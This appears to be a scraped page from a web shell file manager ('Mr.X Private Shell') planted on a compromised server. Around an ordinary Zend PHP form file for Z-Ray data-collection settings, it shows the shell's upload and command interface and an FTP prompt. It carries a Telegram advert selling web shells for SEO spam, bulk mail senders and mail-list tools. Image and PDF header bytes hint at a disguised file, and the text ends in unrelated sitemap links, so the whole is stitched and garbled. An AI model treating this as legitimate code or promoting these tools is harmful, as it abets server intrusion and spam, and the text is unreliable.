xNightR00T File Manager

Loading...
Current Directory:
Name Size Permission Modified Actions
Loading...
$ Waiting for command...
����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

ftpuser@216.73.216.168: ~ $
<?php

namespace DevBar\Forms\Settings;

use Zend\InputFilter\Factory,
    Zend\Form,
    Zend\Form\Element\Select,
    Zend\Validator\GreaterThan,
    Zend\Validator\Hostname,
    Application\Validators\DefaultServer,
    Zend\Validator\Digits,
    Application\Module;
use Zend\Validator\Uri;
use Zend\Form\Element\Radio;
use Zend\Form\Element\Checkbox;
use Zend\Form\Element\Hidden;
use Zend\Form\Annotation\Input;
use ZendServer\Log\Log;

class DataGranularityDevBar extends Form\Form
{

    public function __construct($options = null)
    {
        parent::__construct($options);

        $this->setAttribute('method', 'post')
            ->setName('devbar-granularity')
            ->setAttribute('action', 'DevBar')
            ->setLabel(_t('Data Collection Settings'))
            ->setAttribute('description', _t('Configure Z-Ray data collection settings:'));

        $collectBacktrace = new Radio('zray.collect_backtrace');
        $collectBacktrace->setLabel(_t('Enable Backtracing'));
        $collectBacktrace->setAttribute('description', _t('Enable or disable backtracing in Z-Ray.'));
        $collectBacktrace->setAttribute('section', '');
        $collectBacktrace->setOptions(array_merge($collectBacktrace->getOptions(), array('sub-section-parent' => true)));
        $collectBacktrace->setValueOptions(array(
            array('label' => _t('Yes'), 'value' => 1),
            array('label' => _t('No'), 'value' => 0),
        ));
        $collectBacktrace->setValue($options['collectBacktrace']->getValue());
        $this->add($collectBacktrace);

        $collectBacktraceErrors = new Radio('zray.collect_backtrace.errors_warnings');
        $collectBacktraceErrors->setLabel(_t('Enable Backtracing for Errors and Warnings'));
        $collectBacktraceErrors->setAttribute('id', 'zray.collect_backtrace.errors_warnings');
        $collectBacktraceErrors->setAttribute('description',
            _t('Enable or disable collection of backtraces for Errors and Warnings.'));
        $collectBacktraceErrors->setAttribute('section', '');
        $collectBacktraceErrors->setValueOptions(array(
            array('label' => _t('Yes'), 'value' => 1),
            array('label' => _t('No'), 'value' => 0),
        ));
        $collectBacktraceErrors->setOptions(array_merge($collectBacktraceErrors->getOptions(),
                array('sub-section' => true)));
        $collectBacktraceErrors->setValue($options['collectBacktraceErrors']->getValue());
        $this->add($collectBacktraceErrors);

        // Enable collection backtrace for SQL queries
        $collectBacktraceSQL = new Radio('zray.collect_backtrace.sql_queries');
        $collectBacktraceSQL->setLabel(_t('Collect Backtrace for Database queries'));
        $collectBacktraceSQL->setAttribute('id', 'zray.collect_backtrace.sql_queries');
        $collectBacktraceSQL->setAttribute('description',
            _t('Enable or disable collection of backtraces for Database Queries.'));
        $collectBacktraceSQL->setAttribute('section', '');
        $collectBacktraceSQL->setValueOptions(array(
            array('label' => _t('Yes'), 'value' => 1),
            array('label' => _t('No'), 'value' => 0),
        ));
        $collectBacktraceSQL->setOptions(array_merge($collectBacktraceSQL->getOptions(), array('sub-section' => true)));
        $collectBacktraceSQL->setValue($options['collectBacktraceSQL']->getValue());
        $this->add($collectBacktraceSQL);

        // Enable collection extension data
        $collectExtensionData = new Radio('zray.enable_extensibility');
        $collectExtensionData->setLabel(_t('Collect Extension Data'));
        $collectExtensionData->setAttribute('id', 'zray.enable_extensibility');
        $collectExtensionData->setAttribute('description',
            _t('Enable or disable collection of data for Z-Ray extensions. Disabling data collection will remove extension panels from Z-Ray.'));
        $collectExtensionData->setAttribute('section', '');
        $collectExtensionData->setValueOptions(array(
            array('label' => _t('Yes'), 'value' => 1),
            array('label' => _t('No'), 'value' => 0),
        ));
        $collectExtensionData->setValue($options['collectExtensionData']->getValue());
        $this->add($collectExtensionData);

        //  Max number of log entries in the Errors & Warnings panel
        $this->add(array('name' => 'zray.max_number_log_entries',
            'options' => array('label' => _t('Max Log Entries'),),
            'attributes' => array(
                'value' => $options['max_number_log_entries']->getValue(),
                'type' => 'number',
                'min' => 1,
                'size' => 5,
                'section' => '',
                'id' => 'zray.max_number_log_entries',
                'placeholder' => 10000,
                'description' => _t('Set the max number of log entries displayed in the Errors & Warnings panel.'),)
        ));


        $this->add(array(
            'name' => 'submit',
            'attributes' => array(
                'type' => 'submit',
                'value' => 'Save' // no label since background has built in text
            )
        ));

        // add the actual validators
        $inputFactory = new Factory();
        $validators   = $inputFactory->createInputFilter(array(
        ));
        $this->setInputFilter($validators);
    }

    public function disableForm()
    {
        foreach ($this->getElements() as $element) { /* @var $element \Zend\Form\Element */
            $element->setAttribute('disabled', 'disabled');
            $element->setAttribute('readonly', 'readonly');
        }

        $this->remove('submit');
    }
}

Filemanager

Name Type Size Permission Actions
DataGranularityDevBar.php File 5.56 KB 0644
Σ(゚Д゚;≡;゚д゚)duo❤️a@$%^🥰&%PDF-0-1
https://vn-gateway.com/en/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/en/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/wp-sitemap-posts-elementor_library-1.xmlhttps://vn-gateway.com/en/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/en/wp-sitemap-users-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-users-1.xml